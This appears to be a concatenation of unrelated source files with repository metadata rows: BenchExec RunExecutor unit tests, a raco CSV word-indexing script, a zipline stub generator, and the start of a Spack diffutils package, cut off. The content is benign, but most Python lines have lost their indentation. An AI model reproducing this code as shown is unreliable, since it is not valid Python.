self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_stdin(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
cmd = self.get_runexec_cmdline(
"--input",
"-",
"--walltime",
"1",
"/bin/cat",
output_filename=output_filename,
)
try:
process = subprocess.Popen(
args=cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
)
try:
runexec_output, unused_err = process.communicate("TEST_TOKEN")
except BaseException:
# catch everything, we re-raise
process.kill()
process.wait()
raise
retcode = process.poll()
if retcode:
print(runexec_output)
raise subprocess.CalledProcessError(retcode, cmd, output=runexec_output)
output = os.read(output_fd, 4096).decode().splitlines()
finally:
os.close(output_fd)
os.remove(output_filename)
result = {
key.strip(): value.strip()
for (key, _, value) in (
line.partition("=") for line in runexec_output.splitlines()
)
}
self.check_exitcode_extern(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
float(result["walltime"].rstrip("s")),
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
float(result["cputime"].rstrip("s")),
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result, "returnvalue")
self.check_command_in_output(output, "/bin/cat")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_append_environment_variable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(_, output) = self.execute_run("/bin/sh", "-c", "echo $PATH")
path = output[-1]
(_, output) = self.execute_run(
"/bin/sh",
"-c",
"echo $PATH",
environments={"additionalEnv": {"PATH": ":TEST_TOKEN"}},
)
self.assertEqual(output[-1], path + ":TEST_TOKEN")
def test_new_environment_variable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(_, output) = self.execute_run(
"/bin/sh", "-c", "echo $PATH", environments={"newEnv": {"PATH": "/usr/bin"}}
)
self.assertEqual(output[-1], "/usr/bin")
def test_stop_run(self):
if not os.path.exists("/bin/sleep"):
self.skipTest("missing /bin/sleep")
thread = _StopRunThread(1, self.runexecutor)
thread.start()
(result, output) = self.execute_run(
"/bin/sleep", "10", expect_terminationreason="killed"
)
thread.join()
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/sleep is not approximately zero",
)
self.check_command_in_output(output, "/bin/sleep 10")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_reduce_file_size_empty_file(self):
with tempfile.NamedTemporaryFile() as tmp:
runexecutor._reduce_file_size_if_necessary(tmp.name, 0)
self.assertEqual(os.path.getsize(tmp.name), 0)
def test_reduce_file_size_empty_file2(self):
with tempfile.NamedTemporaryFile() as tmp:
runexecutor._reduce_file_size_if_necessary(tmp.name, 500)
self.assertEqual(os.path.getsize(tmp.name), 0)
def test_reduce_file_size_long_line_not_truncated(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
content = "Long line " * 500
tmp.write(content)
tmp.flush()
runexecutor._reduce_file_size_if_necessary(tmp.name, 500)
with open(tmp.name, "rt") as tmp2:
self.assertMultiLineEqual(tmp2.read(), content)
REDUCE_WARNING_MSG = (
"WARNING: YOUR LOGFILE WAS TOO LONG, SOME LINES IN THE MIDDLE WERE REMOVED."
)
REDUCE_OVERHEAD = 100
def test_reduce_file_size(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
line = "Some text\n"
tmp.write(line * 500)
tmp.flush()
limit = 500
runexecutor._reduce_file_size_if_necessary(tmp.name, limit)
self.assertLessEqual(
os.path.getsize(tmp.name), limit + self.REDUCE_OVERHEAD
)
with open(tmp.name, "rt") as tmp2:
new_content = tmp2.read()
self.assertIn(self.REDUCE_WARNING_MSG, new_content)
self.assertTrue(new_content.startswith(line))
self.assertTrue(new_content.endswith(line))
def test_reduce_file_size_limit_zero(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
line = "Some text\n"
tmp.write(line * 500)
tmp.flush()
runexecutor._reduce_file_size_if_necessary(tmp.name, 0)
self.assertLessEqual(os.path.getsize(tmp.name), self.REDUCE_OVERHEAD)
with open(tmp.name, "rt") as tmp2:
new_content = tmp2.read()
self.assertIn(self.REDUCE_WARNING_MSG, new_content)
self.assertTrue(new_content.startswith(line))
def test_append_crash_dump_info(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run(
"/bin/sh",
"-c",
'echo "# An error report file with more information is saved as:";'
'echo "# $(pwd)/hs_err_pid_1234.txt";'
"echo TEST_TOKEN > hs_err_pid_1234.txt;"
"exit 2",
)
self.assertEqual(
output[-1], "TEST_TOKEN", "log file misses content from crash dump file"
)
def test_integration(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(result, output) = self.execute_run_extern("/bin/echo", "TEST_TOKEN")
self.check_exitcode_extern(result, 0, "exit code of /bin/echo is not zero")
self.check_result_keys(result, "returnvalue")
self.check_command_in_output(output, "/bin/echo TEST_TOKEN")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_home_and_tmp_is_separate(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "echo $HOME $TMPDIR")
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
self.assertRegex(
output[-1],
"/BenchExec_run_[^/]*/home .*/BenchExec_run_[^/]*/tmp",
"HOME or TMPDIR variable does not contain expected temporary directory",
)
def test_temp_dirs_are_removed(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "echo $HOME $TMPDIR")
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
home_dir = output[-1].split(" ")[0]
temp_dir = output[-1].split(" ")[1]
self.assertFalse(
os.path.exists(home_dir),
f"temporary home directory {home_dir} was not cleaned up",
)
self.assertFalse(
os.path.exists(temp_dir),
f"temporary temp directory {temp_dir} was not cleaned up",
)
def test_home_is_writable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "touch $HOME/TEST_FILE")
self.check_exitcode(
result,
0,
f"Failed to write to $HOME/TEST_FILE, output was\n{output}",
)
def test_no_cleanup_temp(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(cleanup_temp_dir=False) # create RunExecutor with desired parameter
(result, output) = self.execute_run(
"/bin/sh", "-c", 'echo "$TMPDIR"; echo "" > "$TMPDIR/test"'
)
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
temp_dir = output[-1]
test_file = os.path.join(temp_dir, "test")
subprocess.run(["test", "-f", test_file], check=True)
self.assertEqual(
"tmp", os.path.basename(temp_dir), "unexpected name of temp dir"
)
self.assertNotEqual(
"/tmp", temp_dir, "temp dir should not be the global temp dir"
)
subprocess.run(["rm", "-r", os.path.dirname(temp_dir)], check=True)
def test_require_cgroup_invalid(self):
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(SystemExit):
RunExecutor(additional_cgroup_subsystems=["invalid"])
self.assertIn(
'Cgroup subsystem "invalid" was required but is not available',
"\n".join(log.output),
)
def test_require_cgroup_cpu(self):
try:
self.setUp(additional_cgroup_subsystems=["cpu"])
except SystemExit as e:
self.skipTest(e)
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(result, output) = self.execute_run("/bin/cat", "/proc/self/cgroup")
self.check_exitcode(result, 0, "exit code of /bin/cat is not zero")
for line in output:
if re.match(r"^[0-9]*:([^:]*,)?cpu(,[^:]*)?:/(.*/)?benchmark_.*$", line):
return # Success
self.fail("Not in expected cgroup for subsystem cpu:\n" + "\n".join(output))
def test_set_cgroup_cpu_shares(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
try:
self.setUp(additional_cgroup_subsystems=["cpu"])
except SystemExit as e:
self.skipTest(e)
(result, _) = self.execute_run(
"/bin/echo", cgroupValues={("cpu", "shares"): 42}
)
self.check_exitcode(result, 0, "exit code of /bin/echo is not zero")
# Just assert that execution was successful,
# testing that the value was actually set is much more difficult.
def test_nested_runexec(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
self.setUp(
dir_modes={
# Do not mark /home hidden, would fail with python from virtualenv
"/": containerexecutor.DIR_READ_ONLY,
"/tmp": containerexecutor.DIR_FULL_ACCESS, # for inner_output_file
"/sys/fs/cgroup": containerexecutor.DIR_FULL_ACCESS,
}
)
inner_args = ["--", "/bin/echo", "TEST_TOKEN"]
with tempfile.NamedTemporaryFile(
mode="r", prefix="inner_output_", suffix=".log"
) as inner_output_file:
inner_cmdline = self.get_runexec_cmdline(
*inner_args, output_filename=inner_output_file.name
)
outer_result, outer_output = self.execute_run(*inner_cmdline)
inner_output = inner_output_file.read().strip().splitlines()
logging.info("Outer output:\n%s", "\n".join(outer_output))
logging.info("Inner output:\n%s", "\n".join(inner_output))
self.check_result_keys(outer_result, "returnvalue")
self.check_exitcode(outer_result, 0, "exit code of inner runexec is not zero")
self.check_command_in_output(inner_output, "/bin/echo TEST_TOKEN")
self.assertEqual(
inner_output[-1], "TEST_TOKEN", "run output misses command output"
)
def test_starttime(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
before = util.read_local_time()
(result, _) = self.execute_run("/bin/echo")
after = util.read_local_time()
self.check_result_keys(result)
run_starttime = result["starttime"]
self.assertIsNotNone(run_starttime.tzinfo, "start time is not a local time")
self.assertLessEqual(before, run_starttime)
self.assertLessEqual(run_starttime, after)
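# The container variant below reruns the whole TestRunExecutor suite inside
# Linux namespaces; its setUp skips the tests when namespaces are unavailable
# and by default mounts "/" read-only while hiding /home and /tmp.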
class TestRunExecutorWithContainer(TestRunExecutor):
def setUp(self, *args, **kwargs):
try:
container.execute_in_namespace(lambda: 0)
except OSError as e:
self.skipTest(f"Namespaces not supported: {os.strerror(e.errno)}")
dir_modes = kwargs.pop(
"dir_modes",
{
"/": containerexecutor.DIR_READ_ONLY,
"/home": containerexecutor.DIR_HIDDEN,
"/tmp": containerexecutor.DIR_HIDDEN,
},
)
self.runexecutor = RunExecutor(
use_namespaces=True, dir_modes=dir_modes, *args, **kwargs
)
def get_runexec_cmdline(self, *args, **kwargs):
return [
"python3",
runexec,
"--container",
"--read-only-dir",
"/",
"--hidden-dir",
"/home",
"--hidden-dir",
"/tmp",
"--dir",
"/tmp",
"--output",
kwargs["output_filename"],
] + list(args)
def execute_run(self, *args, **kwargs):
return super(TestRunExecutorWithContainer, self).execute_run(
workingDir="/tmp", *args, **kwargs
)
def test_home_and_tmp_is_separate(self):
self.skipTest("not relevant in container")
def test_temp_dirs_are_removed(self):
self.skipTest("not relevant in container")
def test_no_cleanup_temp(self):
self.skipTest("not relevant in container")
def check_result_files(
self, shell_cmd, result_files_patterns, expected_result_files
):
output_dir = tempfile.mkdtemp("", "output_")
try:
result, output = self.execute_run(
"/bin/sh",
"-c",
shell_cmd,
output_dir=output_dir,
result_files_patterns=result_files_patterns,
)
output_str = "\n".join(output)
self.assertEqual(
result["exitcode"].value,
0,
f"exit code of {' '.join(shell_cmd)} is not zero,\n"
f"result was {result!r},\noutput was\n{output_str}",
)
result_files = []
for root, _unused_dirs, files in os.walk(output_dir):
for file in files:
result_files.append(
os.path.relpath(os.path.join(root, file), output_dir)
)
expected_result_files.sort()
result_files.sort()
self.assertListEqual(
result_files,
expected_result_files,
f"\nList of retrieved result files differs from expected list,\n"
f"result was {result!r},\noutput was\n{output_str}",
)
finally:
shutil.rmtree(output_dir, ignore_errors=True)
def test_result_file_simple(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["."], ["TEST_FILE"])
def test_result_file_recursive(self):
self.check_result_files(
"mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["."],
["TEST_DIR/TEST_FILE"],
)
def test_result_file_multiple(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; echo TEST_TOKEN > TEST_FILE2",
["."],
["TEST_FILE", "TEST_FILE2"],
)
def test_result_file_symlink(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; ln -s TEST_FILE TEST_LINK",
["."],
["TEST_FILE"],
)
def test_result_file_no_match(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["NO_MATCH"], [])
def test_result_file_no_pattern(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", [], [])
def test_result_file_empty_pattern(self):
self.assertRaises(
ValueError,
lambda: self.check_result_files("echo TEST_TOKEN > TEST_FILE", [""], []),
)
def test_result_file_partial_match(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["TEST_DIR"],
["TEST_DIR/TEST_FILE"],
)
def test_result_file_multiple_patterns(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; "
"echo TEST_TOKEN > TEST_FILE2; "
"mkdir TEST_DIR; "
"echo TEST_TOKEN > TEST_DIR/TEST_FILE; ",
["TEST_FILE", "TEST_DIR/TEST_FILE"],
["TEST_FILE", "TEST_DIR/TEST_FILE"],
)
def test_result_file_wildcard(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; "
"echo TEST_TOKEN > TEST_FILE2; "
"echo TEST_TOKEN > TEST_NOFILE; ",
["TEST_FILE*"],
["TEST_FILE", "TEST_FILE2"],
)
def test_result_file_absolute_pattern(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["/"], ["tmp/TEST_FILE"])
def test_result_file_absolute_and_pattern(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["TEST_FILE", "/tmp/TEST_DIR"],
["tmp/TEST_FILE", "tmp/TEST_DIR/TEST_FILE"],
)
def test_result_file_relative_traversal(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE", ["foo/../TEST_FILE"], ["TEST_FILE"]
)
def test_result_file_illegal_relative_traversal(self):
self.assertRaises(
ValueError,
lambda: self.check_result_files(
"echo TEST_TOKEN > TEST_FILE", ["foo/../../bar"], []
),
)
def test_result_file_recursive_pattern(self):
self.check_result_files(
"mkdir -p TEST_DIR/TEST_DIR; "
"echo TEST_TOKEN > TEST_FILE.txt; "
"echo TEST_TOKEN > TEST_DIR/TEST_FILE.txt; "
"echo TEST_TOKEN > TEST_DIR/TEST_DIR/TEST_FILE.txt; ",
["**/*.txt"],
[
"TEST_FILE.txt",
"TEST_DIR/TEST_FILE.txt",
"TEST_DIR/TEST_DIR/TEST_FILE.txt",
],
)
def test_file_count_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(container_tmpfs=False) # create RunExecutor with desired parameter
filehierarchylimit._CHECK_INTERVAL_SECONDS = 0.1
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"for i in $(seq 1 10000); do touch $i; done",
files_count_limit=100,
result_files_patterns=None,
expect_terminationreason="files-count",
)
        self.check_exitcode(result, 9, "exit code of killed process is not 9")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_file_size_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(container_tmpfs=False) # create RunExecutor with desired parameter
filehierarchylimit._CHECK_INTERVAL_SECONDS = 0.1
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"for i in $(seq 1 100000); do echo $i >> TEST_FILE; done",
files_size_limit=100,
result_files_patterns=None,
expect_terminationreason="files-size",
)
        self.check_exitcode(result, 9, "exit code of killed process is not 9")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_path_with_space(self):
temp_dir = tempfile.mkdtemp(prefix="BenchExec test")
try:
# create RunExecutor with desired parameter
self.setUp(
dir_modes={
"/": containerexecutor.DIR_READ_ONLY,
"/home": containerexecutor.DIR_HIDDEN,
"/tmp": containerexecutor.DIR_HIDDEN,
temp_dir: containerexecutor.DIR_FULL_ACCESS,
}
)
temp_file = os.path.join(temp_dir, "TEST_FILE")
result, output = self.execute_run(
"/bin/sh", "-c", f"echo TEST_TOKEN > '{temp_file}'"
)
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertTrue(
os.path.exists(temp_file),
f"File '{temp_file}' not created, output was:\n" + "\n".join(output),
)
with open(temp_file, "r") as f:
self.assertEqual(f.read().strip(), "TEST_TOKEN")
finally:
shutil.rmtree(temp_dir)
def test_uptime_with_lxcfs(self):
if not os.path.exists("/var/lib/lxcfs/proc"):
self.skipTest("missing lxcfs")
result, output = self.execute_run("cat", "/proc/uptime")
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code for reading uptime is not zero")
uptime = float(output[-1].split(" ")[0])
self.assertLessEqual(
uptime, 10, f"Uptime {uptime}s unexpectedly high in container"
)
def test_uptime_without_lxcfs(self):
if not os.path.exists("/var/lib/lxcfs/proc"):
self.skipTest("missing lxcfs")
# create RunExecutor with desired parameter
self.setUp(container_system_config=False)
result, output = self.execute_run("cat", "/proc/uptime")
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code for reading uptime is not zero")
uptime = float(output[-1].split(" ")[0])
# If uptime was less than 10s, LXCFS probably was in use
self.assertGreaterEqual(
uptime, 10, f"Uptime {uptime}s unexpectedly low in container"
)
class _StopRunThread(threading.Thread):
def __init__(self, delay, runexecutor):
super(_StopRunThread, self).__init__()
self.daemon = True
self.delay = delay
self.runexecutor = runexecutor
def run(self):
time.sleep(self.delay)
self.runexecutor.stop()
class TestRunExecutorUnits(unittest.TestCase):
"""unit tests for parts of RunExecutor"""
def test_get_debug_output_with_error_report_and_invalid_utf8(self):
invalid_utf8 = b"\xFF"
with tempfile.NamedTemporaryFile(mode="w+b", delete=False) as report_file:
with tempfile.NamedTemporaryFile(mode="w+b") as output:
output_content = f"""Dummy output
# An error report file with more information is saved as:
# {report_file.name}
More output
""".encode()
report_content = b"Report output\nMore lines"
output_content += invalid_utf8
report_content += invalid_utf8
output.write(output_content)
output.flush()
output.seek(0)
report_file.write(report_content)
report_file.flush()
runexecutor._get_debug_output_after_crash(output.name, "")
self.assertFalse(os.path.exists(report_file.name))
self.assertEqual(output.read(), output_content + report_content)
| apache-2.0 | 5,282,793,122,061,487,000 | 37.85045 | 105 | 0.555978 | false | 3.976395 | true | false | false |
uwescience/raco | c_test_environment/c_index_strings.py | 1 | 1244 | import csv
import sys
#TODO take a schema as input
class WordIndexer:
def __init__(self, indexf):
self.words = {}
self.count = 0
self.indexfw = open(indexf, 'w')
def add_word(self, w):
if w in self.words:
return self.words[w]
else:
self.indexfw.write(w+'\n')
t = self.count
self.count += 1
self.words[w] = t
return t
def close(self):
self.indexfw.close()
def indexing(inputf, delim_in):
intfile = inputf + '.i'
indexf = inputf + '.index'
delim_out = ' '
wi = WordIndexer(indexf)
with open(inputf, 'r') as ins:
reader = csv.reader(ins, delimiter=delim_in)
with open(intfile, 'w') as outs:
writer = csv.writer(outs, delimiter=delim_out)
for row in reader:
cols = [wi.add_word(w) for w in row]
writer.writerow(cols)
wi.close()
return intfile, indexf
if __name__ == '__main__':
if len(sys.argv) < 2:
raise Exception("usage: %s inputfile [delim]" % sys.argv[0])
if len(sys.argv) == 3:
delim = sys.argv[2]
else:
delim = ' '
indexing(sys.argv[1], delim_in=delim)
| bsd-3-clause | 9,030,464,873,541,193,000 | 20.824561 | 68 | 0.522508 | false | 3.398907 | false | false | false |
bartosh/zipline | etc/gen_type_stubs.py | 5 | 1635 | import inspect
from operator import attrgetter
from textwrap import dedent
from zipline import api, TradingAlgorithm
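# Writes a .pyi stub next to zipline.api: for every TradingAlgorithm API method
# it emits the bound signature plus the original docstring so editors can offer
# completions for the api module.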
def main():
with open(api.__file__.rstrip('c') + 'i', 'w') as stub:
# Imports so that Asset et al can be resolved.
# "from MOD import *" will re-export the imports from the stub, so
# explicitly importing.
stub.write(dedent("""\
import collections
from zipline.assets import Asset, Equity, Future
from zipline.assets.futures import FutureChain
from zipline.finance.asset_restrictions import Restrictions
from zipline.finance.cancel_policy import CancelPolicy
from zipline.pipeline import Pipeline
from zipline.protocol import Order
from zipline.utils.events import EventRule
from zipline.utils.security_list import SecurityList
"""))
# Sort to generate consistent stub file:
for api_func in sorted(TradingAlgorithm.all_api_methods(),
key=attrgetter('__name__')):
sig = inspect._signature_bound_method(inspect.signature(api_func))
indent = ' ' * 4
stub.write(dedent('''\
def {func_name}{func_sig}:
"""'''.format(func_name=api_func.__name__,
func_sig=sig)))
stub.write(dedent('{indent}{func_doc}'.format(
func_doc=api_func.__doc__ or '\n', # handle None docstring
indent=indent,
)))
stub.write('{indent}"""\n\n'.format(indent=indent))
if __name__ == '__main__':
main()
| apache-2.0 | 6,159,726,706,091,059,000 | 35.333333 | 78 | 0.585933 | false | 4.455041 | false | false | false |
AlphaStaxLLC/scalr | app/python/scalrpy/util/dbmanager.py | 2 | 11297 | import time
import socket
import threading
import pymysql
import pymysql.err
import pymysql.cursors
from scalrpy.util import helper
from scalrpy import LOG
def make_connection(config, autocommit=True):
connection = pymysql.connect(
user=config['user'],
passwd=config['pass'],
db=config['name'],
host=config['host'],
port=config['port'],
cursorclass=pymysql.cursors.DictCursor,
connect_timeout=config.get('timeout', 10)
)
connection.autocommit(autocommit)
return connection
def validate_connection(connection):
try:
return connection.ping()
except:
try:
connection.close()
except:
pass
return False
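# DB wraps pymysql with one connection per thread, drawn from a validated
# helper.Pool; in autocommit mode (the default) each execute() borrows a
# connection for a single query and returns it to the pool afterwards.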
class DB(object):
def __init__(self, config, pool_size=None):
self._local = threading.local()
def _make_connection():
return make_connection(config, autocommit=True)
def _validate_connection(connection):
return validate_connection(connection)
self._connection_pool = helper.Pool(
_make_connection,
_validate_connection,
pool_size if pool_size else config.get('pool_size', 4))
def autocommit(self, state):
if state and self._connection:
self._connection_pool.put(self._local.connection)
self._local.cursor.close()
self._local.cursor = None
self._local.connection = None
self._local.autocommit = bool(state)
@property
def _connection(self):
try:
return self._local.connection
except AttributeError:
self._local.connection = None
return self._local.connection
@property
def _autocommit(self):
try:
return self._local.autocommit
except AttributeError:
self._local.autocommit = True
return self._local.autocommit
def execute(self, query, retries=0, retry_timeout=10):
while True:
try:
if self._autocommit or not self._connection:
self._local.connection = self._connection_pool.get(timeout=10)
self._local.connection.autocommit(self._autocommit)
self._local.cursor = self._connection.cursor()
try:
start_time = time.time()
self._local.cursor.execute(query)
end_time = time.time()
if end_time - start_time > 1:
LOG.debug('Query too slow: %s\n%s...' %
(end_time - start_time, query[:150]))
results = self._local.cursor.fetchall()
if results is not None:
results = tuple(results)
return results
finally:
if self._autocommit:
self._local.cursor.close()
self._connection_pool.put(self._local.connection)
self._local.connection = None
self._local.cursor = None
except (pymysql.err.OperationalError, pymysql.err.InternalError, socket.timeout):
if not retries:
raise
retries -= 1
time.sleep(retry_timeout)
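    # Stream large result sets by re-issuing the query with growing
    # "LIMIT offset, chunk" clauses, yielding one chunk of rows at a time and
    # stopping early once max_limit rows have been fetched.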
def execute_with_limit(self, query, limit, max_limit=None, retries=0, retry_timeout=10):
"""
:returns: generator
"""
if max_limit:
i, chunk_size = 0, min(limit, max_limit)
else:
i, chunk_size = 0, limit
while True:
is_last_iter = bool(max_limit) and (i + 1) * chunk_size > max_limit
if is_last_iter:
limit_query = query + \
" LIMIT %s, %s" % (i * chunk_size, max_limit - i * chunk_size)
else:
limit_query = query + " LIMIT %s, %s" % (i * chunk_size, chunk_size)
results = self.execute(limit_query, retries=retries, retry_timeout=retry_timeout)
if not results:
break
yield results
if len(results) < limit or is_last_iter:
break
i += 1
def commit(self):
if self._connection:
self._local.connection.commit()
self._local.cursor.close()
def rollback(self):
if self._connection:
self._connection.rollback()
class ScalrDB(DB):
def load_server_properties(self, servers, names):
names = list(names)
servers_id = list(set(server['server_id'] for server in servers if server['server_id']))
if not servers_id:
return
query = (
"SELECT server_id, name, value "
"FROM server_properties "
"WHERE name IN ({0}) "
"AND server_id IN ({1})"
).format(str(names)[1:-1], str(servers_id)[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['server_id'], {}).update({result['name']: result['value']})
for server in servers:
if server['server_id'] not in tmp:
continue
for k, v in tmp[server['server_id']].iteritems():
if k in server and server[k]:
continue
server[k] = v
return
def load_client_environment_properties(self, envs, names):
names = list(names)
envs_ids = list(set(env['id'] for env in envs if env['id'] or env['id'] == 0))
if not envs_ids:
return tuple()
query = (
"SELECT env_id, name, value "
"FROM client_environment_properties "
"WHERE name IN ({0}) "
"AND env_id IN ({1})"
).format(str(names)[1:-1], str(envs_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['env_id'], {}).update({result['name']: result['value']})
for env in envs:
if env['id'] not in tmp:
continue
for k, v in tmp[env['id']].iteritems():
if k in env and env[k]:
continue
env[k] = v
return
def load_farm_settings(self, farms, names):
names = list(names)
farms_ids = list(set(farm['id'] for farm in farms if farm['id'] or farm['id'] == 0))
if not farms_ids:
return dict()
query = (
"SELECT farmid farm_id, name, value "
"FROM farm_settings "
"WHERE name IN({0}) "
"AND farmid IN ({1})"
).format(str(names)[1:-1], str(farms_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['farm_id'], {}).update({result['name']: result['value']})
for farm in farms:
if farm['id'] not in tmp:
continue
for k, v in tmp[farm['id']].iteritems():
if k in farm and farm[k]:
continue
farm[k] = v
return
def load_farm_role_settings(self, farms_roles, names):
names = list(names)
farms_roles_ids = list(set(_['id'] for _ in farms_roles if _['id'] or _['id'] == 0))
if not farms_roles_ids:
return dict()
query = (
"SELECT farm_roleid, name, value "
"FROM farm_role_settings "
"WHERE name IN ({0}) "
"AND farm_roleid IN ({1})"
).format(str(names)[1:-1], str(farms_roles_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['farm_roleid'], {}).update({result['name']: result['value']})
for farm_role in farms_roles:
if farm_role['id'] not in tmp:
continue
for k, v in tmp[farm_role['id']].iteritems():
if k in farm_role and farm_role[k]:
continue
farm_role[k] = v
return
def load_vpc_settings(self, servers):
# ec2.vpc.id
farms_id = list(set([_['farm_id'] for _ in servers if _['farm_id'] or _['farm_id'] == 0]))
if not farms_id:
return
query = (
"SELECT farmid, value "
"FROM farm_settings "
"WHERE name = 'ec2.vpc.id' "
"AND farmid IN ({0})"
).format(str(farms_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farmid']] = result['value']
for server in servers:
if server['farm_id'] not in tmp:
continue
server['ec2.vpc.id'] = tmp[server['farm_id']]
# router_role_id
farms_role_id = list(set([_['farm_roleid'] for _ in servers if 'ec2.vpc.id' in _]))
if not farms_role_id:
return
# get router role id from farm_role_settings
query = (
"SELECT farm_roleid, value "
"FROM farm_role_settings "
"WHERE name = 'router.scalr.farm_role_id' "
"AND farm_roleid IN ({0}) "
).format(str(farms_role_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farm_roleid']] = int(result['value'])
for server in servers:
if server['farm_roleid'] not in tmp:
continue
# router.scalr.farm_role_id has int type
server['router_role_id'] = int(tmp[server['farm_roleid']])
# get router role id from farm_roles
query = (
"SELECT id router_role_id, farmid "
"FROM farm_roles "
"WHERE role_id IN "
"(SELECT role_id FROM role_behaviors WHERE behavior='router') "
"AND farmid IN ({0})"
).format(str(farms_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farmid']] = result['router_role_id']
for server in servers:
if 'router_role_id' not in server and server['farm_id'] in tmp:
server['router_role_id'] = tmp[server['farm_id']]
# router_vpc_ip
routers_role_id = list(set(_['router_role_id']
for _ in servers if 'ec2.vpc.id' in _ and 'router_role_id' in _))
if not routers_role_id:
return
query = (
"SELECT farm_roleid, value "
"FROM farm_role_settings "
"WHERE name = 'router.vpc.ip' "
"AND farm_roleid IN ({0})"
).format(str(routers_role_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farm_roleid']] = result['value']
for server in servers:
if 'router_role_id' in server and server['router_role_id'] in tmp:
server['router.vpc.ip'] = tmp[server['router_role_id']]
return
| apache-2.0 | -2,952,279,632,889,608,000 | 34.637224 | 100 | 0.512348 | false | 3.979218 | true | false | false |
iulian787/spack | var/spack/repos/builtin/packages/diffutils/package.py | 2 | 1246 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
from spack import *
class Diffutils(AutotoolsPackage, GNUMirrorPackage):
"""GNU Diffutils is a package of several programs related to finding
differences between files."""
executables = [r'^diff$']
homepage = "https://www.gnu.org/software/diffutils/"
